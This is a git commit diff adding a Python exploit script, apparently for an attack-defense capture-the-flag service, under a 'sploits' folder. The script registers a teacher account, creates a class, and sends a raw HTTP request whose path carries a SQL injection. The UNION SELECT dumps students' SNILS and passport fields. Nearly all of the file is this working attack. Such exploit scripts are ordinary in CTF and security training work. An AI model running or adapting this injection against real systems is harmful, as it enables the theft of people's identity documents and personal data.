init here

2025-11-26 21:32:41 +03:00
commit 33c97acade
91 changed files with 9155 additions and 0 deletions
--- a/sploits/01_sql_bad_escape.py
+++ b/sploits/01_sql_bad_escape.py
@@ -0,0 +1,38 @@
+#!/usr/bin/env python3
+
+import socket
+import common
+
+credentials = common.register_random_teacher()
+headers = common.get_auth_headers(credentials)
+class_id = common.create_class(credentials)
+
+injection = (
+    "01%2F01%2F2077' "
+    "' UNION SELECT id AS id, user_id AS class_id, snils AS date, "
+    "passport AS title, 'gotcha' AS homework FROM students "
+    "WHERE '-1' = '-1"
+)
+
+path = f"/api/classes/{class_id}/lessons/{injection}"
+url = common.BASE + path
+
+s = socket.create_connection((common.HOST, common.PORT))
+
+s.sendall(f"""GET {path} HTTP/1.1
+Authorization: {headers["Authorization"]}
+
+""".encode("utf-8"))
+
+chunks = []
+
+while True:
+    data = s.recv(4096)
+    if not data:
+        break
+
+    chunks.append(data)
+
+body = b"".join(chunks).decode("utf-8")
+
+print(body)